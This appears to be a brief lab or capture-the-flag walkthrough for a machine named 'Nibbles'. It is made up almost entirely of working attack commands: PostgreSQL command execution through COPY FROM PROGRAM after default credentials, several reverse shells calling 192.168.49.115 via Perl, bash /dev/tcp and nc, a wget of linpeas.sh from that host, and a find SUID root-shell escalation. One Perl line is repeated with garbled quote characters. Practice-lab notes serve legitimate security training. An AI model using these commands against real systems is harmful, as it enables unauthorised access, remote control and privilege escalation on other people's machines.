Nibbles
Postgres was using default creds
We can try this POC:
#PoC
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
#Reverse shell
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.49.115:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
bash -i >& /dev/tcp/192.168.49.115/4242 0>&1
/bin/sh -i 2>&1|nc 192.168.49.115 4444
COPY files FROM PROGRAM βperl -MIO -e ββ$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,β192.168.49.115:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;βββ;
Postgres Reverse Shell https://github.com/squid22/PostgreSQL_RCE/blob/main/postgresql_rce.py
wget http://192.168.49.115:5000/linpeas.sh -o linpeas.sh --tries 1
after running linpeas i found that SUID is enabled for find
https://gtfobins.github.io/gtfobins/find/
./find . -exec /bin/sh - \; -quit
./find . -exec /bin/sh -p \; -quit
Last updated